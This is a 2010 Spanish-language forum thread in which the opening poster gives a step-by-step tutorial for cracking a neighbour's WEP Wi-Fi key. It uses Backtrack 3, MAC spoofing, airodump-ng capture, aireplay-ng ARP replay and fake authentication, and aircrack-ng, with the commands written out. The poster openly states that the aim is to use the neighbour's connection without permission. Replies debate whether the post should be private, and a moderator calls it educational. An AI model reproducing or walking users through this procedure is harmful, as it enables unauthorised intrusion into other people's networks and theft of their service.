Sv Community El Salvador

Soporte y Tecnología => Internet & Redes => Tutoriales Internet/Redes => Mensaje iniciado por: thegarzo en julio 04, 2010, 06:01:39 pm

Título: Sacar clave WEP con Backtrack 3
Publicado por: thegarzo en julio 04, 2010, 06:01:39 pm
Hace ratos mi vecino me estaba tentando con su conexion de 2 mb, que mi laptop alcanzaba. entonces puse manos a la obra y me re-busque en comprar la tarjeta wireless Bus (Netgear WG11T) con chip Atheros AR5001 que es el ideal para lo que les explica este tuto que me encontre y porsupuesto el Live CD tipo Linux Backtrack 3 , (esta el Bactrack 4 pero dicen que no furula). 

Ócupe todo lo mencionado en una laptop con entrada a trajeta PC Bus y no tarde mas de 10 minutos y ya tenia la clave wep. Además  solo lo he realizado con Redes TURBONET.

Esta es la tarjeta que ocupe:

(http://www.ciudadwireless.com/images/WG511TFSCW.jpg)

El Bactrack 3 lo baje de un post de taringa hace tiempo y no creo que tengan problema en encontralo e incluso hay versiones para USB.

asi se ve:
(http://kin.calvin.free.fr/img/BackTrack%203%20Final%20Screen%20.png)

Recomendaciones:


Acá el Tutorial:

En este pequeño tuto les mostrare como crackear la clave WEP de los Routers!!

En este tuto yo utilizo:
Atheros AR5001 + Wireless Network Adapter (tarjeta de red)
Back Track 3

Weno, primero abrimos una shell, y escribimos:

airmon-ng stop ath0

(http://fgdlaw.blu.livefilestore.com/y1pf4e4NUdOfvtsCJ8j0bJXjXwF7kmpyrN5luEmV55s-LCviMreOLkNlJobjIF5lbloZyDdArSBkkg/1.JPG)
(esto es como para detener la tarjeta de red ath0)

Despues escribimos:

macchanger -m 11:22:33:44:55:66 wifi0
(http://fgdlaw.blu.livefilestore.com/y1pf4e4NUdOfvtjTxQsZ92f6dnklvf3AqGrEaiRRxXm5SLx-VKVBlx9Smz7pEqOezRWHilQo2KRmrg/2.JPG)
(esto es para cambiar nuesta direccion mac)

Despues ponemos

airmon-ng start wifi0

(http://fgdlaw.blu.livefilestore.com/y1pq62d0zzL3llqPFozJv2lXPc65qGzEvYhEVinVeezzyT16YUr3PL4FQDbQpif9TaJR6NeXZpF2Mc/3.JPG)
(esto es para activar nuestra tarjeta en modo monitor)

Para saber que todo ha ido bien ponemos

iwconfig

(http://fgdlaw.blu.livefilestore.com/y1pcqs0xL63qto_PRN1mh6W5WGp-r9GeefnDABgRHHrhzrkn_LTnOCFcUPt48LO1MaD0D8FcWxBZeM/4.JPG)
(en esta pantallita podemos ver que esta en modo monitor y ver que cambiamos la direccion mac)

Despues buscamos las redes que hay al alcance

airodump-ng ath0

(http://fgdlaw.blu.livefilestore.com/y1pcqs0xL63qtqOsbe7MdHpAUSgU3VmAkaFnrcuHGggDjAyJ_p6ZMKL-I7xkADTkaJxJpUrWTTkWyk/5.JPG)
Aqui debemos apuntar en una hojita lo siguiente:
BSSID (xx:xx:xx:xx:xx:xx)
CH (en este caso es 5)
ESSID (Nombre de la RED)

ya que tengamos estos datos, apretamos (control+C) y vremos que se detendra la pantalla anterior..

Despues ponemos..

airodump-ng --channel x --write xxx ath0
x= canal, como en el paso anterio el 5 pues quedaria asi (--channel 5)
xxx= nombre, aqui pueden ponel elnombre que quieran, pero acuerdense de lo que ponen, y en mi caso quedaria asi (--write pass)

airodump-ng --channel 5 --write pass ath0      (hasta aqui vamos bien?)

(http://fgdlaw.blu.livefilestore.com/y1p1L2tweQK45a3rvVxCLbbunn99krwS1ZqHQ_uacJfbzPPCb9hFEVpPIjpl4BGr7LEaCvJF9nKhMk/6.JPG)

(aqui tendremos una pantallita similar a la anterior)

Ahora abrimos otra shell...
y en ella ponemos:

aireplay-ng -3 -b (mac de la victima) -h (nuestra mac) ath0

y pues quedaria mas o menos asi;

aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h 11:22:33:44:55:66
(http://fgdlaw.blu.livefilestore.com/y1p5hSiWJuzwu_6u_INfhxghiafSzO4rJPpe3BbVWNAqYqMj2-BAd_c7uNABwTMjb_FAzYn0EQA34M/7.JPG)
(esto es para empezar a capturar datos ARP)

Ahora abrimos otra shell y escribimos:

aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h (nuestra mac) ath0

a mi me quedaria asi:

aireplay-ng -1 0 ESSID -a xx:xx:xx:xx:xx:xx -h 11:22:33:44:55:66 ath0
(http://fgdlaw.blu.livefilestore.com/y1pnus5uZSt-1n1nZi1x4pCaeF5WTHHn68_cwA5HziWTIBmnAWHvCa-vM0Llgw8xS0F_Uo-N7WT2uo/8.JPG)

y veremos que los ARP empiezan a subir de volada....

hasta este paso debemos de tener dos shell's abrietas
(http://fgdlaw.blu.livefilestore.com/y1pnus5uZSt-1nRMdzKaW4oW2GFlmNfSeJzwbihc2sVSAs6IWereLiYkviy5_ZcAxgLu_L-_F3-Y8c/9.JPG)
Ahora podemos ver que despues de 10 minutos ya tenemos 62160 ARP, con eso es mas que suficiente, ahora a las dos shell's las cancelamos, en cada una apretamos (control+C). con 50000 bastara.
(http://fgdlaw.blu.livefilestore.com/y1p5yfxr26d-WSIvAAcgqXmwp7f4rFRj4ZxzZB5_r7of1tXfyB6o9aowZNv7eWbffTXAw5dsFiyNls/10.JPG)

Ya estamos en lo ultimo, ahora abrimos otra shell y escribimos:

aircrack-ng xx-01.cap
xx= el nombre que les dije que se acordaran, en mi caso es (pass)

aircrack-ng pass-01.cap

(http://fgdlaw.blu.livefilestore.com/y1pkbBbo9MaJxKBUEsTZt4UFC03D-XeJAipwqp5Swh5KpjW7IlxxyZKfGJhvvF3JgSdJyz7yQCoMtU/11.JPG)

Como la red que nosotros elegimos es la opcion 1 pues ponemos el 1 y damos enter..

(http://fgdlaw.blu.livefilestore.com/y1pasdisEOrV0I178hGoeOAWcaXf2RFGsxf-KbzxpzSkcQalNLXtJO-wgsF176XmZ19KTA7S6D5-4M/12.JPG)

Y listo ya tenemos la Key Found xx:xx:xx:xx:xx

esa la debemos poner pero sin los dos puntos asi: (xxxxxxxxxx)

y listo!!! ya podemos navegar en internet...

Espero que les haya servido.

FUENTE: http://foro.portalhacker.net/index.php/topic,70867.0.html (http://foro.portalhacker.net/index.php/topic,70867.0.html)

Tambien pueden buscar en youtube video tutoriales para trabajar con otras tarjetas o con la misma.



Título: Re:Sacar clave WEP con Backtrack 3
Publicado por: kojik69 en julio 04, 2010, 06:07:02 pm
Buen aporte, pero pienso que debería ir en privado. :roll:
Título: Re:Sacar clave WEP con Backtrack 3
Publicado por: thegarzo en julio 04, 2010, 06:16:17 pm
Buen aporte, pero pienso que debería ir en privado. :roll:
no estoy muy familiarizado con svcommunity si me explicas, por que ?
Título: Re:Sacar clave WEP con Backtrack 3
Publicado por: kojik69 en julio 04, 2010, 06:33:37 pm
no estoy muy familiarizado con svcommunity si me explicas, por que ?

Pues, no se si está en las reglas que no se pueden postear este tipo de tutos, pero si no hay problema con eso, por acá acostumbran visitar personal de las empresas telefónicas y cuando se postean truquitos como este no tardan mucho en solucionar el "error" o deficiencia de seguridad.
Título: Re:Sacar clave WEP con Backtrack 3
Publicado por: plunplan en julio 04, 2010, 06:34:43 pm
Pues, no se si está en las reglas que no se pueden postear este tipo de tutos, pero si no hay problema con eso, por acá acostumbran visitar personal de las empresas telefónicas y cuando se postean truquitos como este no tardan mucho en solucionar el "error" o deficiencia de seguridad.

que van a hacer? inventar un protocolo de seguridad infranqueable?
Título: Re:Sacar clave WEP con Backtrack 3
Publicado por: The_Pipas en julio 04, 2010, 06:36:38 pm
Pues, no se si está en las reglas que no se pueden postear este tipo de tutos, pero si no hay problema con eso, por acá acostumbran visitar personal de las empresas telefónicas y cuando se postean truquitos como este no tardan mucho en solucionar el "error" o deficiencia de seguridad.
pero como dice Plum!!! es de invente algo que creo que tardaran mucho o si!!! :shock:
Título: Re:Sacar clave WEP con Backtrack 3
Publicado por: Mandrak3 en julio 04, 2010, 06:37:18 pm
gracias por el aporte, seria bueno que lo muevan..
Título: Re:Sacar clave WEP con Backtrack 3
Publicado por: rdoggsv en julio 04, 2010, 06:42:15 pm
Lo moví a Internet y Redes, no va en privado porque tanto así como ilegal no es, es algo educativo :)
Título: Re:Sacar clave WEP con Backtrack 3
Publicado por: Pattyxoxo en julio 04, 2010, 08:52:26 pm
nada que WPA2 con RADIUS y pass con un poco de encriptacion old school de 256 bits no logre detener... gracias Vgarzona por el tip del pass XD
Título: Re:Sacar clave WEP con Backtrack 3
Publicado por: arex en julio 04, 2010, 09:15:54 pm
se parece al wiflax esta bien el tutorial
Título: Re:Sacar clave WEP con Backtrack 3
Publicado por: moyo18 en julio 04, 2010, 09:19:38 pm
backtrack y wifislax se parecen muchisimo.... a mi en lo personal me gusta mas backtrack y ya esta la version 4.

lo unico q kien usa wep en estos tiempos es bien raro casi todos usan wpa o wpa2 ..... hay unas formas d juakear wpa uasndo tarjetas d nvidia.

esto deberia d ir a "juakin"
Título: Re:Sacar clave WEP con Backtrack 3
Publicado por: Hey-man en julio 04, 2010, 10:23:55 pm
Exelente Aporte!!!   :drinks: